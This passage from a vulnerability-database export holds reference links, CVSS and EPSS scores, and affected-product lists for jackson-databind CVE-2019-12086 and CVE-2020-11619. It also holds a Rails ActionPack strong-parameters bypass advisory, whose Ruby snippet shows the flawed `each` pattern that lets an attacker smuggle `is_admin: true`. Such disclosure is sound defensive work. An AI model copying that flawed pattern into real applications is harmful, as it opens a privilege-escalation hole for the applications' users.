scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujan2020.html
54
reference_url https://www.oracle.com/security-alerts/cpujul2020.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujul2020.html
55
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
56
reference_url https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
57
reference_url https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
58
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1713468
reference_id 1713468
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1713468
59
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=929177
reference_id 929177
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=929177
60
reference_url https://nvd.nist.gov/vuln/detail/CVE-2019-12086
reference_id CVE-2019-12086
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2019-12086
61
reference_url https://github.com/advisories/GHSA-5ww9-j83m-q7qx
reference_id GHSA-5ww9-j83m-q7qx
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5ww9-j83m-q7qx
62
reference_url https://access.redhat.com/errata/RHSA-2020:1454
reference_id RHSA-2020:1454
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:1454
63
reference_url https://access.redhat.com/errata/RHSA-2020:3192
reference_id RHSA-2020:3192
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3192
64
reference_url https://usn.ubuntu.com/USN-4813-1/
reference_id USN-USN-4813-1
reference_type
scores
url https://usn.ubuntu.com/USN-4813-1/
fixed_packages
aliases CVE-2019-12086, GHSA-5ww9-j83m-q7qx
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9wej-f7zx-pfeq
24
url VCID-a5sk-5grx-eyaf
vulnerability_id VCID-a5sk-5grx-eyaf
summary 
jackson-databind mishandles the interaction between serialization gadgets and typing
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.springframework.aop.config.MethodLocatingFactoryBean (aka spring-aop).
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-11619.json
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-11619.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-11619
reference_id
reference_type
scores
0
value 0.0133
scoring_system epss
scoring_elements 0.79947
published_at 2026-04-13T12:55:00Z
1
value 0.0133
scoring_system epss
scoring_elements 0.79955
published_at 2026-04-12T12:55:00Z
2
value 0.0133
scoring_system epss
scoring_elements 0.79971
published_at 2026-04-11T12:55:00Z
3
value 0.0133
scoring_system epss
scoring_elements 0.79951
published_at 2026-04-09T12:55:00Z
4
value 0.0133
scoring_system epss
scoring_elements 0.79943
published_at 2026-04-08T12:55:00Z
5
value 0.0133
scoring_system epss
scoring_elements 0.79914
published_at 2026-04-07T12:55:00Z
6
value 0.0133
scoring_system epss
scoring_elements 0.79926
published_at 2026-04-04T12:55:00Z
7
value 0.0133
scoring_system epss
scoring_elements 0.79899
published_at 2026-04-01T12:55:00Z
8
value 0.0133
scoring_system epss
scoring_elements 0.79905
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-11619
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11619
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11619
3
reference_url https://github.com/FasterXML/jackson-databind
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind
4
reference_url https://github.com/FasterXML/jackson-databind/issues/2680
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/issues/2680
5
reference_url https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E
6
reference_url https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E
7
reference_url https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html
8
reference_url https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
reference_id
reference_type
scores
url https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
9
reference_url https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-11619
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv2
scoring_elements AV:N/AC:M/Au:N/C:P/I:P/A:P
1
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-11619
11
reference_url https://security.netapp.com/advisory/ntap-20200511-0004
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20200511-0004
12
reference_url https://security.netapp.com/advisory/ntap-20200511-0004/
reference_id
reference_type
scores
url https://security.netapp.com/advisory/ntap-20200511-0004/
13
reference_url https://www.oracle.com/security-alerts/cpujan2021.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujan2021.html
14
reference_url https://www.oracle.com/security-alerts/cpujul2020.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujul2020.html
15
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
16
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1826805
reference_id 1826805
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1826805
17
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
18
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:linux:*:*
reference_id cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:linux:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:linux:*:*
19
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:vmware_vsphere:*:*
reference_id cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:vmware_vsphere:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:vmware_vsphere:*:*
20
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:windows:*:*
reference_id cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:windows:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:windows:*:*
21
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*
reference_id cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*
22
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*
23
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*
24
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_calendar_server:8.0.0.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_calendar_server:8.0.0.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_calendar_server:8.0.0.4.0:*:*:*:*:*:*:*
25
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_contacts_server:8.0.0.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_contacts_server:8.0.0.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_contacts_server:8.0.0.4.0:*:*:*:*:*:*:*
26
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_contacts_server:8.0.0.5.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_contacts_server:8.0.0.5.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_contacts_server:8.0.0.5.0:*:*:*:*:*:*:*
27
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*
28
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*
29
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.4.0:*:*:*:*:*:*:*
30
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_network_charging_and_control:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_network_charging_and_control:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_network_charging_and_control:*:*:*:*:*:*:*:*
31
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_network_charging_and_control:6.0.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_network_charging_and_control:6.0.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_network_charging_and_control:6.0.1:*:*:*:*:*:*:*
32
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0:*:*:*:*:*:*:*
33
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*
34
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*
35
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:*
36
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*
37
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*
38
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*
39
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*
40
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*
41
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*
42
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*
43
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_sales_audit:14.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_sales_audit:14.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_sales_audit:14.1:*:*:*:*:*:*:*
44
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*
45
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*
46
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*
47
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*
48
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:19.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:19.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:19.0:*:*:*:*:*:*:*
49
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*
50
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*
51
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
52
reference_url https://github.com/advisories/GHSA-27xj-rqx5-2255
reference_id GHSA-27xj-rqx5-2255
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-27xj-rqx5-2255
53
reference_url https://access.redhat.com/errata/RHSA-2020:2067
reference_id RHSA-2020:2067
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2067
54
reference_url https://access.redhat.com/errata/RHSA-2020:2320
reference_id RHSA-2020:2320
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2320
55
reference_url https://access.redhat.com/errata/RHSA-2020:2565
reference_id RHSA-2020:2565
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2565
56
reference_url https://access.redhat.com/errata/RHSA-2020:3192
reference_id RHSA-2020:3192
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3192
57
reference_url https://access.redhat.com/errata/RHSA-2020:3196
reference_id RHSA-2020:3196
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3196
58
reference_url https://access.redhat.com/errata/RHSA-2020:3197
reference_id RHSA-2020:3197
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3197
59
reference_url https://access.redhat.com/errata/RHSA-2020:3779
reference_id RHSA-2020:3779
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3779
60
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
61
reference_url https://access.redhat.com/errata/RHSA-2020:5625
reference_id RHSA-2020:5625
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:5625
62
reference_url https://usn.ubuntu.com/USN-4813-1/
reference_id USN-USN-4813-1
reference_type
scores
url https://usn.ubuntu.com/USN-4813-1/
fixed_packages
aliases CVE-2020-11619, GHSA-27xj-rqx5-2255
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-a5sk-5grx-eyaf
25
url VCID-a6sp-18av-wya6
vulnerability_id VCID-a6sp-18av-wya6
summary 
Possible Strong Parameters Bypass in ActionPack
There is a strong parameters bypass vector in ActionPack.

Versions Affected:  rails <= 6.0.3
Not affected:       rails < 5.0.0
Fixed Versions:     rails >= 5.2.4.3, rails >= 6.0.3.1

Impact
------
In some cases user supplied information can be inadvertently leaked from
Strong Parameters.  Specifically the return value of `each`, or `each_value`,
or `each_pair` will return the underlying "untrusted" hash of data that was
read from the parameters.  Applications that use this return value may be
inadvertently use untrusted user input.

Impacted code will look something like this:

```
def update
  # Attacker has included the parameter: `{ is_admin: true }`
  User.update(clean_up_params)
end

def clean_up_params
   params.each { |k, v|  SomeModel.check(v) if k == :name }
end
```

Note the mistaken use of `each` in the `clean_up_params` method in the above
example.

Workarounds
-----------
Do not use the return values of `each`, `each_value`, or `each_pair` in your
application.
references
0
reference_url http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00089.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00089.html
1
reference_url http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00093.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00093.html
2
reference_url http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00107.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
